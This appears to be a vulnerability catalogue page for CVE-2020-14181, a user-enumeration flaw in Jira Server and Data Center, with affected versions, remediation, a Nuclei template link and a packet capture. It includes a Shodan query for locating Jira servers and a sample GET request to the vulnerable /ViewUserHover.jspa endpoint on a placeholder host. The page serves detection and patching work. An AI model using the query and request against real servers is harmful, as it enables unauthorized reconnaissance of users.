🔙 목록으로 돌아가기

CVE-2020-14181: Jira Server and Data Center - Information Disclosure

TitleJira Server and Data Center - Information Disclosure
Authorbjhulst
SeverityMedium
ImpactAn attacker can gain access to sensitive information, potentially leading to further attacks.
RemediationApply the necessary patches or updates provided by Atlassian to fix the vulnerability.
CVSS Score5.3
EPSS Score0.93124
CVE IDCVE-2020-14181
CWE IDCWE-200
Shodan Queryhttp.component:"Atlassian Jira"http.component:"atlassian jira"
Tags cve cve2020 atlassian jira packetstorm vuln

🔍 Vulnerability Description

Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.

🌐 HTTP Request

GET /secure/ViewUserHover.jspa HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-14181.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-14181.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A